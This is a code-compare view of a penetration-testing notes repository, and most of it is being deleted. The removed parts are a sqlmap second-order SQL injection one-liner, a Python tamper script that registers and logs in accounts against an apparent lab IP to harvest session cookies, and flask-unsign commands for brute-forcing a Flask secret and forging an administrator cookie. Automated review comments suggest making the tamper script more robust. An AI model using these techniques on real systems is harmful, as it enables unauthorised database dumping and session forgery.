Compare commits
No commits in common. "ca53f6bcb98f62a3d7e11971bbf57dad8f7aaed2" and "2ea19b21c95e57489c29f330b356904f2eaefa01" have entirely different histories.
ca53f6bcb9...2ea19b21c9
@ -2,7 +2,6 @@
* [sqlmap](https://github.com/sqlmapproject/sqlmap.git)
* [sqlmap usages](https://github.com/sqlmapproject/sqlmap/wiki/Usage)
* [CheatSheet](https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet/)
* [Examples](https://www.security-sleuth.com/sleuth-blog/2017/1/3/sqlmap-cheat-sheet)
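Review bot: the `sqlmap usages` wiki link is present on only one side of this hunk while the other three links appear as unchanged context on both sides, and the header shrinks the block from 7 lines to 6, so this change drops that link. Keep it (or replace it with an equivalent reference), because the flag table later in the file (`--tables`, `-T`) only summarises options that are fully described on that Usage page.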
@ -32,22 +31,6 @@ sqlmap -u http://<target-IP>/site.php --forms --dump-all
|--tables|Show tables|
|-T|Specify table|
### Advanced Features
#### Second Order SQL Injection
In case of an SQL injection where the result will be visible through another resource, use a second order injection. It is even possible to use a script in beforehand to login in and get a cookie, for example. A tutorial can be found on [Le Thanh Phuc's blog](https://lethanhphuc-pk.medium.com/second-order-sql-injection-explained-with-example-f67fb199f5e5)
An example oneliner including a tamper script and a first and second request captured in Burpsuite
```sh
sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py --second-req $(pwd)/second.req -p username --proxy http://127.0.0.1:8080 --technique=U --dbms mysql
```
The `second_order_tamper.py` can be found inside this repository. Users are created through this script by SQLmap to further login through `login.request` and read the output through `second.req` (delete the cookie from the header). The vulnerable POST parameter is `username`.
Dump the databases, tables afterwards
## Other Tools
### Damn Small SQLi Scanner (DSSS)
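Review bot: the Advanced Features / Second Order SQL Injection section is removed wholesale here (22 lines become 6), and with it the only description of the non-obvious parts of the setup: `--second-req` pointing at a captured request from which the Cookie header has been deleted, `-p username` as the injected parameter, `--technique=U --dbms mysql`, and the fact that the tamper script registers and logs in a fresh user for every payload before the second request is read. If the section goes because `second_order_tamper.py` is deleted in the same compare, state that and link to where the material moved; otherwise keep at least the one-liner and the note about stripping the cookie from `second.req`, since what remains in the file only covers the basic flags (`--tables`, `-T`).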
@ -1,74 +0,0 @@
#!/usr/bin/env python
'''
The following line is an example on how to utilize the script
sqlmap -r $(pwd)/login.request --tamper $(pwd)/second_order_tamper.py \
--second-req $(pwd)/second.req -p username --technique=U --dbms mysql
'''
import re
import requests
from lib.core.enums import PRIORITY # Imported by SQLmap
__priority__ = PRIORITY.NORMAL
def dependencies():
'''
define dependencies
'''
pass
URL = "http://10.10.212.150:8000"
def login_account(payload):
'''
Create account and return the cookie
The SQLi is in the username field
'''
proxies = {'http': 'http://127.0.0.1:8080'}
#cookies = {"PHPSESSID": "6laafab1f6om5rqjsbvhmq9mf2"}
params = {
"username": payload, # random.randint(100000, 99999999), # SQLi field
"email": "admin@admin.com",
"password": "password123" # Needs to be similar to '-r req.txt'
}
url = f"{URL}/register"
_ = requests.post(
url, data=params, timeout=10, # cookies=cookies,
verify=False, allow_redirects=True, proxies=proxies
)
url = f"{URL}/login"
response = requests.post(
url, timeout=10, data=params, # cookies=flask_cookie,
verify=False, allow_redirects=True, proxies=proxies
)
#print(response.headers)
flask_cookie = re.search(
'session=(.*?);', response.headers['Set-Cookie']).group(1)
# url = f"{URL}/logout"
# response = requests.post(
# url, timeout=10, cookies=flask_cookie,
# verify=False, allow_redirects=True, proxies=proxies
# )
return f"session={flask_cookie}"
def tamper(payload, **kwargs):
'''
The function used by SQLmap
'''
headers = kwargs.get("headers", {})
headers["Cookie"] = login_account(payload)
# login_account(payload)
return payload
#if __name__ == "__main__":
# login_account("yo")
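Review bot: if this tamper script survives anywhere, `login_account` has two unguarded failure paths that would abort an entire sqlmap run with a traceback: `response.headers['Set-Cookie']` raises `KeyError` when the login response sets no cookie at all, and `re.search('session=(.*?);', ...).group(1)` raises `AttributeError` when the `session=` value is not followed by a `;` or the cookie has a different name. Use `response.headers.get('Set-Cookie', '')`, check the match object before calling `.group(1)`, and return `None` with a logged message so sqlmap can carry on with the next payload. Smaller points: `URL` and `proxies` are hard-coded to a lab address and to `127.0.0.1:8080` even though the README one-liner already passes `--proxy`, so they belong in module-level configuration or environment variables; the module docstring's example command omits that `--proxy` and so no longer matches the README; and the comment on `password` should say the value must be identical to the one in the `-r` request rather than 'similar', because the account this function registers is the one the captured `login.request` then has to log in with.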
@ -1,25 +0,0 @@
# Flask Cookies
They have their own structure, similar to JWT. The cookie can be decoded and encoded with and sometimes without a key.
Cookies are not encrypted but signed, so the key for the siging can sometimes be bruteforces or can be found via a wordlist.
## Read Flask Cookie
Using `flask-unsign` this can be done via
```sh
flask-unsign --decode --cookie '<COOKIE>'
```
## Unsign the Flask Cookie
Unsigning the cookie can be done in the following way
```sh
flask-unsign --wordlist $WORDLIST --unsign --cookie '<COOKIE>' --no-literal-eval
```
## Sign the Flask Cookie
Siging the cookie can be done via
```sh
flask-unsign --sign --cookie "{'id':0,'loggedin':True,'username':'administrator'}" --secret '<Secret>'
```
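Review bot: the opening paragraph says the cookie "can be decoded and encoded with and sometimes without a key", which contradicts the sentence right after it: because Flask session cookies are signed rather than encrypted, `--decode` never needs the secret, and only `--unsign` (verifying the signature, or recovering the secret from a wordlist) and `--sign` (producing a cookie the server will accept) do; rewording it that way makes the three sections below line up with the text. Also "siging" appears twice for "signing", and "bruteforces" should be "brute-forced".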